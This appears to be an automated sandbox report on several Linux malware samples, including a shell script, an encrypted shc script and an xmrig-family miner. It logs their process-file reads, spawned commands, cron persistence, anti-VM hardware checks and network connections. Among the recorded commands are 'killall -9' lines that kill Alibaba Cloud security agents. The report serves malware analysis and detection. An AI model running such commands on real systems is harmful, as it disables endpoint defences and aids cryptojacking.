File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/744/cmdline /usr/bin/killall N/A
File opened for reading /proc/1092/stat /usr/bin/killall N/A
File opened for reading /proc/682/stat /usr/bin/killall N/A
File opened for reading /proc/1143/cmdline /usr/bin/killall N/A
File opened for reading /proc/1151/stat /usr/bin/killall N/A
File opened for reading /proc/1204/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/239/stat /usr/bin/killall N/A
File opened for reading /proc/1092/cmdline /usr/bin/killall N/A
File opened for reading /proc/1055/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/175/stat /usr/bin/killall N/A
File opened for reading /proc/501/stat /usr/bin/killall N/A
File opened for reading /proc/1513/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/1212/stat /usr/bin/killall N/A
File opened for reading /proc/1279/cmdline /usr/bin/killall N/A
File opened for reading /proc/168/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/1358/stat /usr/bin/killall N/A
File opened for reading /proc/1517/stat /usr/bin/killall N/A
File opened for reading /proc/180/stat /usr/bin/killall N/A
File opened for reading /proc/1520/stat /usr/bin/killall N/A
File opened for reading /proc/471/stat /usr/bin/killall N/A
File opened for reading /proc/170/stat /usr/bin/killall N/A
File opened for reading /proc/734/stat /usr/bin/killall N/A
File opened for reading /proc/1125/stat /usr/bin/killall N/A
File opened for reading /proc/1331/cmdline /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/1102/stat /usr/bin/killall N/A
File opened for reading /proc/206/cmdline /usr/bin/killall N/A
File opened for reading /proc/1518/stat /usr/bin/killall N/A
File opened for reading /proc/1520/stat /usr/bin/killall N/A
File opened for reading /proc/552/cmdline /usr/bin/killall N/A
File opened for reading /proc/1151/cmdline /usr/bin/killall N/A
File opened for reading /proc/34/stat /usr/bin/killall N/A
File opened for reading /proc/1155/stat /usr/bin/killall N/A
File opened for reading /proc/432/stat /usr/bin/killall N/A
File opened for reading /proc/535/stat /usr/bin/killall N/A
File opened for reading /proc/1334/cmdline /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/15/cmdline /usr/bin/killall N/A
File opened for reading /proc/552/cmdline /usr/bin/killall N/A
File opened for reading /proc/205/stat /usr/bin/killall N/A
File opened for reading /proc/535/stat /usr/bin/killall N/A
File opened for reading /proc/682/stat /usr/bin/killall N/A
File opened for reading /proc/689/stat /usr/bin/killall N/A
File opened for reading /proc/1187/stat /usr/bin/killall N/A
File opened for reading /proc/31/stat /usr/bin/killall N/A
File opened for reading /proc/587/stat /usr/bin/killall N/A
File opened for reading /proc/734/stat /usr/bin/killall N/A
File opened for reading /proc/1280/stat /usr/bin/killall N/A
File opened for reading /proc/440/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/239/cmdline /usr/bin/killall N/A
File opened for reading /proc/180/stat /usr/bin/killall N/A
File opened for reading /proc/1520/cmdline /usr/bin/killall N/A
File opened for reading /proc/1147/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsbe-20240611-en

Max time kernel

3s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/239/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/357/stat /usr/bin/killall N/A
File opened for reading /proc/154/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/692/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/374/stat /usr/bin/killall N/A
File opened for reading /proc/713/stat /usr/bin/killall N/A
File opened for reading /proc/150/stat /usr/bin/killall N/A
File opened for reading /proc/692/cmdline /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/171/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/664/stat /usr/bin/killall N/A
File opened for reading /proc/121/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/356/stat /usr/bin/killall N/A
File opened for reading /proc/171/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/715/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/150/cmdline /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/357/stat /usr/bin/killall N/A
File opened for reading /proc/712/stat /usr/bin/killall N/A
File opened for reading /proc/223/stat /usr/bin/killall N/A
File opened for reading /proc/328/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/239/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/396/stat /usr/bin/killall N/A
File opened for reading /proc/324/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Signatures

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

Processes

/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsbe-20240611-en

Max time kernel

2s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/700/stat /usr/bin/killall N/A
File opened for reading /proc/429/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/357/stat /usr/bin/killall N/A
File opened for reading /proc/248/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/701/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/687/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/151/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/157/stat /usr/bin/killall N/A
File opened for reading /proc/359/stat /usr/bin/killall N/A
File opened for reading /proc/157/stat /usr/bin/killall N/A
File opened for reading /proc/330/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/124/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/679/stat /usr/bin/killall N/A
File opened for reading /proc/125/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/125/cmdline /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/735/stat /usr/bin/killall N/A
File opened for reading /proc/740/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/667/stat /usr/bin/killall N/A
File opened for reading /proc/700/stat /usr/bin/killall N/A
File opened for reading /proc/357/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/725/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/353/stat /usr/bin/killall N/A
File opened for reading /proc/125/stat /usr/bin/killall N/A
File opened for reading /proc/687/stat /usr/bin/killall N/A
File opened for reading /proc/724/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/706/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/157/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2204-amd64-20240729-en

Max time kernel

149s

Max time network

153s

Command Line

[/tmp/xrx/xrx]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xrx/xrx N/A

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xrx/xrx N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/xrx/xrx N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/types /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xrx/xrx N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/target_node /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/node/online /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cgroup.controllers /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset.mems.effective /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/devices/target_node /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset.cpus.effective /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/xrx/xrx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/driver/nvidia/gpus /tmp/xrx/xrx N/A
File opened for reading /proc/mounts /tmp/xrx/xrx N/A
File opened for reading /proc/self/cpuset /tmp/xrx/xrx N/A
File opened for reading /proc/meminfo /tmp/xrx/xrx N/A

Processes

/tmp/xrx/xrx

[/tmp/xrx/xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.archive.ubuntu.com udp
US 8.8.8.8:53 archive.ubuntu.com udp
US 8.8.8.8:53 archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 91.189.91.82:80 security.ubuntu.com tcp
GB 185.125.190.81:80 security.ubuntu.com tcp
US 91.189.91.82:80 security.ubuntu.com tcp
US 91.189.91.81:80 security.ubuntu.com tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

4s

Max time network

131s

Command Line

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/bash N/A
N/A N/A /usr/bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/198/ctty /usr/bin/pgrep N/A
File opened for reading /proc/4/ctty /usr/bin/pgrep N/A
File opened for reading /proc/496/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/37/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2246/stat /usr/bin/pgrep N/A
File opened for reading /proc/2351/stat /usr/bin/pgrep N/A
File opened for reading /proc/36/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/53/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/32/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2019/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2256/stat /usr/bin/pgrep N/A
File opened for reading /proc/2018/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/777/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/189/stat /usr/bin/pgrep N/A
File opened for reading /proc/1724/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1751/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2547/ctty /usr/bin/pgrep N/A
File opened for reading /proc/36/stat /usr/bin/pgrep N/A
File opened for reading /proc/793/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2018/stat /usr/bin/pgrep N/A
File opened for reading /proc/1085/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2007/stat /usr/bin/pgrep N/A
File opened for reading /proc/189/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/755/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2309/ctty /usr/bin/pgrep N/A
File opened for reading /proc/24/stat /usr/bin/pgrep N/A
File opened for reading /proc/1132/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1865/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1265/stat /usr/bin/pgrep N/A
File opened for reading /proc/43/stat /usr/bin/pgrep N/A
File opened for reading /proc/34/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/514/ctty /usr/bin/pgrep N/A
File opened for reading /proc/338/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/863/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1083/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2182/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1/ctty /usr/bin/pgrep N/A
File opened for reading /proc/4/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/591/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1862/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2202/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2543/stat /usr/bin/pgrep N/A
File opened for reading /proc/2263/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2340/status /usr/bin/pgrep N/A
File opened for reading /proc/20/ctty /usr/bin/pgrep N/A
File opened for reading /proc/31/stat /usr/bin/pgrep N/A
File opened for reading /proc/42/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1103/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1919/status /usr/bin/pgrep N/A
File opened for reading /proc/2196/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2370/stat /usr/bin/pgrep N/A
File opened for reading /proc/11/ctty /usr/bin/pgrep N/A
File opened for reading /proc/47/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/53/ctty /usr/bin/pgrep N/A
File opened for reading /proc/55/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/194/status /usr/bin/pgrep N/A
File opened for reading /proc/1075/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/41/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/195/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/34/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2204/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2319/status /usr/bin/pgrep N/A
File opened for reading /proc/14/ctty /usr/bin/pgrep N/A

Processes

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' "$@" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

